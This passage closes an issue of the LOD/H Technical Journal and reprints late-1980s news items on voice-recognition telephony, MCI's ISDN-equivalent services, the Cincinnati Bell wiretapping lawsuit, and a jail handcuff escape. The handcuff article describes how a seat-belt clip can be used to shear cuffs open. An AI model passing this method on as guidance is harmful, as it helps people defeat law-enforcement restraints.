What would be interesting about the Northern Telecom technology is to see
|
|||
|
if it can be expanded to other gear, such as private branch exchanges, and if
|
|||
|
if can beef up the automated-attendant feature. Rather than require callers
|
|||
|
to punch a lot of buttons to get in touch with someone, perhaps voice
|
|||
|
recognition could be used to "listen" for a name and then direct the call to
|
|||
|
the appropriate party. That would be especially useful in situations where you
|
|||
|
don't know the exact extension of whomever you are calling. Trying to maneuver
|
|||
|
around an on-line telephone directory can be a real pain in the neck.
|
|||
|
|
|||
|
At the same time, voice-recognition technology can be paired with voice
|
|||
|
mail so that users can access their voice mailboxes without having to punch in
|
|||
|
an identification number or password or to deal with a menu. It would be a lot
|
|||
|
easier to just say, "Read messages".
|
|||
|
|
|||
|
There's still a lot of potential to be developed in voice technology.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Source: PC WEEK May 15, 1989
|
|||
|
Title: MCI to Provide Transition to ISDN
|
|||
|
Author: Matt Kramer
|
|||
|
|
|||
|
MCI Communications Inc. hopes to give its customers a smoother transition
|
|||
|
to ISDN with new services that offer many of the technology's features without
|
|||
|
requiring costly upgrades to ISDN-compatible equipment.
|
|||
|
|
|||
|
The communications company recently announced new Integrated Services
|
|||
|
Digital Network and "ISDN-equivalent" services that will provide MCI customers
|
|||
|
with network-configuration, control and management features, according to
|
|||
|
company officials.
|
|||
|
|
|||
|
The equivalent services, which will be available this fall, run over
|
|||
|
existing in-band signaling channels. True ISDN services require a separate
|
|||
|
out-of-band D channel for signalling.
|
|||
|
|
|||
|
MCI's full ISDN services are scheduled for delivery in the first quarter of
|
|||
|
next year.
|
|||
|
|
|||
|
The equivalent services, while not providing the full ISDN feature set, are
|
|||
|
designed to introduce customers to the benefits of ISDN before requiring them
|
|||
|
to make the investment in ISDN-compatible telecommunications gear, officials
|
|||
|
said.
|
|||
|
|
|||
|
"While they may not want to make that expenditure now, they certainly want
|
|||
|
to have ISDN-like services available", said Kevin Sharer, senior vice
|
|||
|
president of sales and marketing at MCI, in Washington.
|
|||
|
|
|||
|
The equivalent products include the MCI 800 Enhanced Services Package,
|
|||
|
which allows customers with dedicated access lines to receive the number of
|
|||
|
the calling party just prior to receiving the call. This Automatic Number
|
|||
|
Identification (ANI) is then used to query a database to bring up a customer's
|
|||
|
account or other information, according to officials.
|
|||
|
|
|||
|
Northern Telecom Inc. and Rockwell International Corp. have developed new
|
|||
|
software for their private branch exchanges that permits the switches to
|
|||
|
handle in-band ANI transmission.
|
|||
|
|
|||
|
Some observers expect the equivalent services will be useful in the
|
|||
|
evolution from existing telecommunications to ISDN. "If all you need is ANI,
|
|||
|
then the equivalent services might be just what you want", said Claude Stone,
|
|||
|
vice president of product development at the First National Bank of Chicago
|
|||
|
and vice chairman of the national ISDN Users Forum.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
Source: A newspaper
|
|||
|
Date: Sometime in June
|
|||
|
Title: Sheriff's prisoners find handcuffs are a snap to get out of
|
|||
|
Author: unknown
|
|||
|
|
|||
|
Ten jail prisoners who discovered an ingenious way to escape from handcuffs
|
|||
|
are sending alarms across the nation. Emergency bulletins will be sent to law
|
|||
|
enforcement agencies via teletype machines nationwide. On Friday, deputies
|
|||
|
were taking 10 prisoners from the jail downtown to another one in the city.
|
|||
|
All were handcuffed. "When the deputy opened the back of the van, all 10 guys
|
|||
|
were smiling and said, 'See what we did,'" the Sheriff said. Each prisoner
|
|||
|
held up his arms to show broken handcuffs.
|
|||
|
|
|||
|
The culprit was a simple seat belt clip. The circular cuffs are connected
|
|||
|
with a chain, held tightly to each cuff by a swivel-head link that moves
|
|||
|
freely to ensure that the chain cannot be twisted when the wrists move. Seat
|
|||
|
belt clips typically have one or two holes, or slots, that lock them into
|
|||
|
place with the buckle. The prisoners learned that jamming the swivel-head on
|
|||
|
the clip stops the swivel head from turning freely. "A quick twist of the
|
|||
|
wrist, and the chain shears off at the cuff," the sheriff said.
|
|||
|
|
|||
|
The sheriff ordered seat belts removed from jail vans. He also ordered
|
|||
|
that the prisoners in cruisers be handcuffed with their hands behind their
|
|||
|
back and the seat belts locked firmly across them. Deputies often handcuffed
|
|||
|
prisoners' hands in front of their bodies. But even if prisoners were cuffed
|
|||
|
behind their backs, it would not be difficult for them to manipulate the
|
|||
|
swivel head into a seat belt buckle and twist themselves free -- if they
|
|||
|
could reach the seat belt. "This is a danger to every law enforcement officer
|
|||
|
in the country", the sheriff said.
|
|||
|
|
|||
|
Handcuff manufacturers contacted Friday are studying the possibility of
|
|||
|
redesigning the handcuffs by enlarging the swivel head or placing some type
|
|||
|
of shroud over it. "People in jail have 24 hours a day to figure a way out"
|
|||
|
said the sheriff.
|
|||
|
|
|||
|
"Although only 10 people know the technique, I guarantee that the entire
|
|||
|
jail population will know how to do it before the day is up,". "The only
|
|||
|
people who won't know about it is law enforcement officers". The sheriff
|
|||
|
met Friday with representatives of several local and federal agencies. An
|
|||
|
FBI spokesman said the escape technique will be described in the FBI's
|
|||
|
nationally distributed LAW ENFORCEMENT BULLETIN.
|
|||
|
|
|||
|
Although the sheriff was grateful to learn about the technique from
|
|||
|
prisoners who did not try to escape, he was not amused. He told deputies,
|
|||
|
"Charge them with destruction of county property. We'll see how funny they
|
|||
|
think that is."
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
Title: Federal grand jury probes Cincinnati Bell wiretapping flap
|
|||
|
Source: Data Communications
|
|||
|
Issue: November 1988
|
|||
|
Author: John Bush
|
|||
|
|
|||
|
A federal grand jury in Ohio is investigating illegal wiretapping
|
|||
|
allegations involving two former employees of Cincinnati Bell who claim the
|
|||
|
telephone company ordered them for more than a decade to eavesdrop on
|
|||
|
customers.
|
|||
|
|
|||
|
In addition, an attorney who filed a class-action lawsuit against
|
|||
|
Cincinnati Bell on behalf of the people and companies who were allegedly
|
|||
|
wiretapped, says he is trying to prove that the telephone company sold the
|
|||
|
information gained from the electronic surveillance.
|
|||
|
|
|||
|
A Cincinnati Bell spokesperson denied the charges, saying they were
|
|||
|
trumped-up by the two former employees, who are seeking revenge after being
|
|||
|
fired by the telephone company.
|
|||
|
|
|||
|
The lawsuit has been filed against Cincinnati Bell Inc. on behalf of
|
|||
|
Harold Mills, a former police lieutenant and former commander of the
|
|||
|
Cincinnati Vice Squad, as well as a number of other individuals and companies.
|
|||
|
Among the alleged victims mentioned in the complaint were Sen. Howard
|
|||
|
Metzenbaum (D-Ohio) and Proctor and Gamble Co. (Cincinnati, Ohio).
|
|||
|
|
|||
|
Gene Mesh, the attorney who filed the lawsuit, believes the Cincinnati Bell
|
|||
|
case is not an isolated incident but a trend...an explosion of cancer that
|
|||
|
"this kind of thing [wiretapping] has developed its own markets."
|
|||
|
|
|||
|
When asked if Cincinnati Bell was selling the information gained from
|
|||
|
tapping, Mesh said "we are proceeding along evidentiary lines to prove this."
|
|||
|
|
|||
|
Thus far, the civil action hinges on the testimony of two former Cincinnati
|
|||
|
Bell employees, Leonard Gates, a supervisor, and Robert Draise, an installer
|
|||
|
who at one time worked for Gates. Their combined testimony states that, under
|
|||
|
the auspices of Cincinnati Bell, they conducted over 1,200 illegal wiretaps
|
|||
|
from 1972 to the present.
|
|||
|
|
|||
|
According to Gates, as a result of the Proctor and Gamble wiretap, "we
|
|||
|
were into all of P&G's databases." In addition, both Gates and Draise claim
|
|||
|
to have been in on illegal wiretaps of General Electric Co.'s Aircraft Engines
|
|||
|
Division near Cincinnati. Draise also claims that he was ordered to identify
|
|||
|
all of GE's facsimile and modem lines for Cincinnati Bell.
|
|||
|
|
|||
|
Neither Proctor and Gamble nor General Electric would comment. However
|
|||
|
Sen. Howard Metzenbaum's Washington, D.D., office says that the Senator
|
|||
|
"found the news shocking and is awaiting more information to see if it
|
|||
|
[the wiretap] actually happened.
|
|||
|
|
|||
|
Meanwhile Cincinnati Bell maintains that the suit and allegations are
|
|||
|
merely Gates's and Draise's way of getting back at the phone company for
|
|||
|
having fired them.
|
|||
|
|
|||
|
Cyndy Cantoni, a spokesperson for Cincinnati Bell, said that "we have heard
|
|||
|
the allegations that we wiretapped, but if Draise or Gates did any tapping, it
|
|||
|
wasn't done at Cincinnati Bell's request."
|
|||
|
|
|||
|
Cantoni also cited a letter from Cincinnati Bell President Ray Clark that
|
|||
|
went out to all Cincinnati Bell employees in the wake of the publicity
|
|||
|
surrounding the wiretapping accusations. The letter stated that Gates had been
|
|||
|
warned in April 1985 against continuing an affair with an employee he had been
|
|||
|
supervising and who had accused him [Gates] of sexual harassment, according to
|
|||
|
Cantoni.
|
|||
|
|
|||
|
The letter went on to say that Gates reacted to the warning with
|
|||
|
insubordination and threats and "carried on a campaign against the company."
|
|||
|
As a result, Gates was fired for insubordination, says Cantoni. Robert Draise
|
|||
|
was fired after he was convicted of misdemeanor wiretapping charges for
|
|||
|
tapping the phone line of a friend's girlfriend, Cantoni says.
|
|||
|
|
|||
|
Cincinnati Bell is an independent telephone company that was allowed to
|
|||
|
keep the "Bell" trademark after divestiture, since it is older than AT&T,
|
|||
|
says Cantoni.
|
|||
|
|
|||
|
[ End of Document ]
|
|||
|
[ End Of The LOD/H Technical Journal Issue #4 ]
|
|||
|
|